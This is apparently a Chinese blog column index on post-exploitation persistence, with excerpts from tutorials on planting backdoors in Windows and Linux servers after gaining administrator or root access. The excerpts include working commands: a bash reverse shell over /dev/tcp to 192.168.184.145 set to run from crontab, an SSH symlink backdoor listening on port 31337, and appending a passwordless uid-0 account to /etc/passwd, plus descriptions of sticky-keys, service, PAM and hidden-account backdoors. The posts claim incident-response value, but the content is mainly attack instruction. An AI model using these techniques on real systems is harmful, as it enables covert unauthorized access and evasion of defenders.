权限维持
文章平均质量分 85
权限维持
W小哥1
微信公众号:W小哥
展开
-
Windows留后门--教程(五)——shift粘贴键后门
一、shift粘贴键后门介绍Shift粘滞键是当用户连按5次shift就会自动弹出的一个程序,其实不光是粘滞键,还有各种辅助功能,这类辅助功能都拥有一个特点就是当用户未进行登录时也可以触发。所以攻击者很有可能通过篡改这些辅助功能的指向程序来达到权限维持的目的。(辅助功能镜像劫持是一样的原理)二、shift粘贴键后门-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限靶机: windows Server2012IP: 192.168.2原创 2022-03-16 13:39:39 · 4523 阅读 · 1 评论 -
Windows留后门--教程(四)——Windows启动项后门
一、Windows启动项后门介绍Windows启动项后门也是攻击者常用的权限维持方式,大体上可以分为两种。一种是重启电脑时自启动后门程序实现权限维持;另一种是点击某应用、服务、程序时自启动后门程序实现权限维持。二、Windows启动项后门-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限靶机: windows Server2012IP: 192.168.226.128攻击机: kaliIP: 192.168.226.1312.1原创 2022-03-16 13:18:08 · 6868 阅读 · 0 评论 -
Windows留后门--教程(三)——Windows服务后门
一、Windows服务后门介绍在Windows系统中还有一个重要的机制,就是服务。通常大部分的服务都拥有SYSTEM权限,如果攻击者利用Windows的服务机制创建一个后门服务,那么这个后门将比一般的持久化方法更为强健。二、Windows服务后门-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限靶机: windows Server2012IP: 192.168.226.128攻击机: kaliIP: 192.168.226.131原创 2022-03-16 10:11:37 · 6853 阅读 · 0 评论 -
Windows留后门--教程(二)——Windows计划任务后门
一、Windows计划任务后门介绍计划任务是经常被攻击者拿来利用的控制点,计划任务可以让目标主机在特定的时间执行我们预先准备的后门程序从而帮助我们进行权限维持。二、Windows计划任务后门-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限环境: windows Server2012 IP: 192.168.226.1282.1 利用MSF生成一个EXE类型的后门木马2.2 创建计划任务2.3 监听返回的shell三、Win原创 2022-03-15 16:09:02 · 4598 阅读 · 1 评论 -
Windows留后门--教程(一)——Windows系统隐藏账户
一、Windows系统隐藏账户介绍系统隐藏账户是一种最为简单有效的权限维持方式,其做法就是让攻击者创建一个新的具有管理员权限的隐藏账户,因为是隐藏账户,所以防守方是无法通过控制面板或命令行看到这个账户的。二、Windows系统添加隐藏账户-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限环境: windows Server2012 IP: 192.168.226.1282.1 第一种情况:攻击者控制某台机器,并执行添加用户指令n原创 2022-03-14 17:06:53 · 17059 阅读 · 6 评论 -
windows建立隐藏账户(注册表与本地账户管理都查不到)
一、Windows新建隐藏账号CMD进入工具HideAdmin所在的目录下输入HideAdmin.exe后出现使用方法然后按照提示新建隐藏账户xiaowang 密码:xiaowang利用这款工具建立的账户隐藏效果与修改注册表的效果是一样的。在计算机管理中查看不到隐藏账户xiaowang接下来去注册表中查看隐藏账户输入“regedt32.exe”后回车,随后会弹出另一个“注册表编辑器来到“HKEY_LOCAL_MACHINE SAM SAM DomainsAccountUsersN原创 2020-05-22 11:29:44 · 2107 阅读 · 0 评论 -
LINUX留后门--教程(八)—— vim+python文件后门
一、本教程作用1、用在攻击的途径上2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急?不知攻,焉知防二、vim+python文件后门-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限靶机 IP: 192.168.241.142 (Ubuntu 20.04)攻击IP: 192.168.241.128 (kali)查看 Ubuntu 20.04 的 vim 支持情况:可以得知 vim 支持 python3注意:如果服原创 2021-08-04 15:03:47 · 1502 阅读 · 0 评论 -
LINUX留后门--教程(七)—— alias 后门
一、SSH后门介绍当获取到一个服务器的shell之后,肯定需要维持好我们的权限,这里我们需要留个后门方便我们进出。前提: 我们通过各种方式提权到root,拿到root之后才是我们留后门的开始。做了个openssh的后门,也就是root双密码,管理员一个密码、我们的后门一个密码,不影响管理员的那个密码。实验环境: Centos 8二、SSH后门制作教程...原创 2021-08-02 14:07:36 · 2628 阅读 · 3 评论 -
LINUX留后门--教程(六)—— PAM后门
一、本教程作用1、用在攻击的途径上2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急?不知攻,焉知防二、PAM后门-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限靶机 IP: 192.168.160.144 (centos7)攻击IP: 192.168.160.1 (win10 xhell)2.1 pam介绍在过去,我们想要对一个使用者进行认证 (authentication),得要要求用户输入账号口令, 然后透过原创 2021-07-14 17:06:17 · 5866 阅读 · 7 评论 -
LINUX留后门--教程(五)—— crontab隐藏后门
2.3 留crontab隐藏后门好不容易拿下一个网站,以后还想继续使用该系统,通常都会留下一些后门,本次我们留下一个crontab隐藏后门我们把1.sh、2.sh 文件放在本地搭建的web服务上,让受害者去下载执行1.sh文件内容#!/bin/bashbash -i >& /dev/tcp/192.168.184.145/5555 0>&1反弹shell到IP地址:192.168.184.1452.sh文件内容(crontab -l;printf "* * *原创 2021-07-08 09:47:01 · 3467 阅读 · 4 评论 -
LINUX留后门--教程(四)—— ssh 公钥免密
一、本教程作用1、用在攻击的途径上2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急?不知攻,焉知防二、SSH后门-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限环境: 靶机(kali):192.168.160.130攻击机(centos8):192.168.160.131...原创 2021-06-29 17:18:25 · 2280 阅读 · 0 评论 -
LINUX留后门--教程(三)—— 一款短小精致的perl脚本SSH后门
一、本教程作用1、用在攻击的途径上2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急?不知攻,焉知防二、SSH后门-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限环境: 靶机(kali):192.168.160.130攻击机(centos8):192.168.160.1312.1 perl脚本SSH后门介绍:这个ssh 后门伪装成一个perl脚本,名为sshd,位于/usr/sbin/sshd , 将系统原先的ss原创 2021-06-04 18:44:58 · 1250 阅读 · 0 评论 -
LINUX留后门--教程(二)—— SSH软链接后门
一、本教程作用1、用在攻击的途径上2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急?不知攻,焉知防二、添加SSH后门-教程前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限环境: 一台开启ssh的任意Linux服务器就可以(我用的虚拟机)ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337...原创 2021-06-02 13:32:27 · 4944 阅读 · 0 评论 -
LINUX留后门--教程(一)—— 增加超级用户帐号
一、本教程作用1、用在攻击的途径上2、应急响应过程中,黑客会留后门,如果你连这种留后门方法都不会,怎么去应急?不知攻,焉知防二、增加超级用户帐号-教程**前提条件:**假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器root权限2.1 第一种情况:可以交互且允许uid=0的用户远程登录增加超级用户账号命令:echo "cshm:x:0:0::/:/bin/sh" >> /etc/passwd #增加超级用户账号passwd cshm #修改cshm的密码为cs原创 2021-06-01 16:26:50 · 4425 阅读 · 1 评论